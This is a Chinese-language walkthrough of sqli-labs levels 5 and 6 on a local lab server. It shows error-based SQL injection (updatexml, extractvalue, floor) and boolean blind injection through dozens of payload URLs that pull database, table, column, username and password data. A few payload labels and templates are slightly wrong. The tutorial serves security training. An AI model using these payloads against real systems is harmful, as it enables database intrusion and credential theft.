Less 5

正常情况，我们构造闭合，发现没有问题

http://127.0.0.1/sqlilabs/Less-5/?id=1'

当我们输入之后，发现 You are in......我们利用前几关的思路

http://127.0.0.1/sqlilabs/Less-5/?id=1' order by 3--+   回显点为3
查找回显点位置,当前库名
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,3--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,database()--+

发现无论怎么操作都是 You are in......这个时候一般的思路就行不通，猜测是否为其他注入。

尝试报错注入有以下几种类型。

报错注入的概念：
(1). 通过floor报错 and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by
x)a) 其中payload为你要插入的SQL语句需要注意的是该语句将输出字符长度限制为64位
(2). 通过updatexml报错 and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制，其最长输出32位
并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效

(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制，最长32位。

0x00 基于updatexml报错

updatexml使用方法 and updatexml(1,padload,1)

获取库名

http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

十六进制分隔符~ 用0x7e表示

查看表名

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

爆用户名

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(username) from users limit 0,1),0x7e),1)--+

爆密码

http://127.0.0.1/sqlilabs/Less-5/?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(password) from users limit 0,1),0x7e),1)--+

0x01 基于extractvalue报错

用法 and extractvalue(1,payload)

爆库名

十六进制0x23表示#

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select database()),0x23))--+

爆表名

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+

爆列名

http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+

获取数据

查看用户名
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select username from users order by id limit 1,1),0x23))--+
查看密码
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and extractvalue(1,concat(0x23,(select password from users order by id limit 1,1),0x23))--+

0x02 基于floor报错

count(*)：函数返回给定选择中被选的函数

concat()：连接字符串,比如 concat(‘a’,’b’) 就是ab
floor()：向下取整
rand()：随机数函数
rand(0)：伪随机数，生成的随机数有规律
floor(rand(0)*2) ：生成的随机数存在规律0110110011101

floor使用方法 and (select 1 from (select count(),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

floor报错注入满足的条件是数据库中要查询的数据至少3条以上

爆库名

limit 0,1   数据库名为information_schema
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
limit 1,1   数据库名为challenges
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
以此类推。
但有种简便方法一步到位
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

爆表名

http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat(((select concat(table_name) from information_schema.tables where table_schema='security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

爆列名

http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+

获取信息

用户名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
密码
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 2,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+

0x03 布尔盲注

判断当前数据库名称长度
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<10-- -   //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<7-- -    //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<9-- -    //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=7-- -    //显示异常http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8-- -    //显示正常
说明当前数据库名称长度为8

判断当前数据库名称
以第一个字符为例
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>110-- -    //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>120-- -    //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>115-- -    //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>113-- -    //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>114-- -    //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=114-- -    //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=115-- -    //显示正常
对照ascii码表，第一个字母为"s",以此类推...

判断表名长度
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and (select count(table_name) from information_schema.tables where table_schema=database())=4-- -
表名称
http://127.0.0.1/sqlilabs/Less-5/?id=1'  and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100-- -
方法类似，这里不一一举例。

但更为便捷的方法还是自行编写脚本，或者使用sqlmap,bp等工具。

Less 6

和第五关一样只是把'闭合改为"闭合

sqli-labs通关教程 Less-5 and Less 6 （报错注入、布尔盲注）